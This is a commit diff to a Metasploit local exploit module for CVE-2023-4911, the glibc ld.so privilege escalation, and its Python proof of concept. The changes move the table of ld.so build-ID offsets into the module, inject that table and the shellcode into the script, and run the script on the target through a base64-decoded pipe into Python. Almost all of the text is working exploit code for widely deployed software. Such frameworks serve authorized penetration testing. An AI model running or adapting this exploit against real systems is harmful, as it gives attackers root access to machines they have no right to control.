Responded to comments from jvoisin
This commit is contained in:
parent
96241f509a
commit
b86df4820c
|
@ -58,16 +58,7 @@ TARGETS = {
|
||||||
}
|
}
|
||||||
|
|
||||||
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
# Magic offsets for build IDs can be found for versions of glibc by disabling ASLR and using the original PoC: https://haxx.in/files/gnu-acme.py
|
||||||
BUILD_IDS = {
|
BUILD_IDS = METASPLOIT_BUILD_IDS
|
||||||
"69c048078b6c51fa8744f3d7cff3b0d9369ffd53": 561,
|
|
||||||
"3602eac894717d56555552c84fc6b0e4d6a4af72": 561,
|
|
||||||
"a99db3715218b641780b04323e4ae5953d68a927": 561,
|
|
||||||
"a8daca28288575ffc8c7641d40901b0148958fb1": 580,
|
|
||||||
"61ef896a699bb1c2e4e231642b2e1688b2f1a61e": 560,
|
|
||||||
"9a9c6aeba5df4178de168e26fe30ddcdab47d374": 580,
|
|
||||||
"e7b1e0ff3d359623538f4ae0ac69b3e8db26b674": 580,
|
|
||||||
"956d98a11b839e3392fa1b367b1e3fdfc3e662f6": 322,
|
|
||||||
}
|
|
||||||
|
|
||||||
libc = cdll.LoadLibrary("libc.so.6")
|
libc = cdll.LoadLibrary("libc.so.6")
|
||||||
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
libc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)
|
||||||
|
|
|
@ -18,8 +18,15 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
include Msf::Exploit::FileDropper
|
include Msf::Exploit::FileDropper
|
||||||
prepend Msf::Exploit::Remote::AutoCheck
|
prepend Msf::Exploit::Remote::AutoCheck
|
||||||
|
|
||||||
BUILD_IDS = %w[69c048078b6c51fa8744f3d7cff3b0d9369ffd53 3602eac894717d56555552c84fc6b0e4d6a4af72 a99db3715218b641780b04323e4ae5953d68a927 a8daca28288575ffc8c7641d40901b0148958fb1 61ef896a699bb1c2e4e231642b2e1688b2f1a61e 9a9c6aeba5df4178de168e26fe30ddcdab47d374 e7b1e0ff3d359623538f4ae0ac69b3e8db26b674 956d98a11b839e3392fa1b367b1e3fdfc3e662f6]
|
BUILD_IDS = {'69c048078b6c51fa8744f3d7cff3b0d9369ffd53' => 561,
|
||||||
|
'3602eac894717d56555552c84fc6b0e4d6a4af72' => 561,
|
||||||
|
'a99db3715218b641780b04323e4ae5953d68a927' => 561,
|
||||||
|
'a8daca28288575ffc8c7641d40901b0148958fb1' => 580,
|
||||||
|
'61ef896a699bb1c2e4e231642b2e1688b2f1a61e' => 560,
|
||||||
|
'9a9c6aeba5df4178de168e26fe30ddcdab47d374' => 580,
|
||||||
|
'e7b1e0ff3d359623538f4ae0ac69b3e8db26b674' => 580,
|
||||||
|
'956d98a11b839e3392fa1b367b1e3fdfc3e662f6' => 322
|
||||||
|
}
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(
|
super(
|
||||||
update_info(
|
update_info(
|
||||||
|
@ -71,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
'DisclosureDate' => '2023-10-03',
|
'DisclosureDate' => '2023-10-03',
|
||||||
'Notes' => {
|
'Notes' => {
|
||||||
'Stability' => [ CRASH_SAFE, ],
|
'Stability' => [ CRASH_SAFE, ],
|
||||||
'SideEffects' => [ ARTIFACTS_ON_DISK, ],
|
'SideEffects' => [ ],
|
||||||
'Reliability' => [ REPEATABLE_SESSION, ]
|
'Reliability' => [ REPEATABLE_SESSION, ]
|
||||||
}
|
}
|
||||||
)
|
)
|
||||||
|
@ -116,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
|
|
||||||
def check_ld_so_build_id
|
def check_ld_so_build_id
|
||||||
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
# Check to ensure the python exploit has the magic offset defined for the BuildID for ld.so
|
||||||
if command_exists?('file ')
|
if command_exists?('file')
|
||||||
file_cmd_output = ''
|
file_cmd_output = ''
|
||||||
|
|
||||||
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
# This needs to be split up by distro as Ubuntu has readlink and which installed by default but "ld.so" is not
|
||||||
|
@ -128,14 +135,14 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
(file_cmd_output = cmd_exec('file $(ldconfig -p | grep -oE "/.*ld-linux.*so\.[0-9]*")'))
|
||||||
end
|
end
|
||||||
when 'debian'
|
when 'debian'
|
||||||
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
(file_cmd_output = cmd_exec('file "$(readlink -f "$(command -v ld.so)")"'))
|
||||||
else
|
else
|
||||||
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
fail_with(Failure::NoTarget, 'The module has not been tested against this Linux distribution')
|
||||||
end
|
end
|
||||||
|
|
||||||
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
if file_cmd_output =~ /BuildID\[.+\]=(\w+),/
|
||||||
build_id = Regexp.last_match(1)
|
build_id = Regexp.last_match(1)
|
||||||
if BUILD_IDS.include?(build_id)
|
if BUILD_IDS.keys.include?(build_id)
|
||||||
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
print_good("The Build ID for ld.so: #{build_id} is in the list of supported Build IDs for the exploit.")
|
||||||
else
|
else
|
||||||
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
fail_with(Failure::NoTarget, "The Build ID for ld.so: #{build_id} is not in the list of supported Build IDs for the exploit.")
|
||||||
|
@ -160,10 +167,11 @@ class MetasploitModule < Msf::Exploit::Local
|
||||||
# The python script assumes the working directory is the one we can write to.
|
# The python script assumes the working directory is the one we can write to.
|
||||||
cd(datastore['WritableDir'])
|
cd(datastore['WritableDir'])
|
||||||
shell_code = payload.encoded.unpack('H*').first
|
shell_code = payload.encoded.unpack('H*').first
|
||||||
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code)
|
|
||||||
|
exploit_data = exploit_data('CVE-2023-4911', 'cve_2023_4911.py').gsub('METASPLOIT_SHELL_CODE', shell_code).gsub('METASPLOIT_BUILD_IDS', BUILD_IDS.to_s.gsub('=>', ':'))
|
||||||
|
|
||||||
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
# If there is no response from cmd_exec after the brief 15s timeout, this indicates exploit is running successfully
|
||||||
output = cmd_exec("$(echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary})")
|
output = cmd_exec("echo #{Rex::Text.encode_base64(exploit_data)} |base64 -d | #{python_binary}")
|
||||||
if output.blank?
|
if output.blank?
|
||||||
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
print_good('The exploit is running. Please be patient. Receiving a session could take up to 10 minutes.')
|
||||||
else
|
else
|
||||||
|
|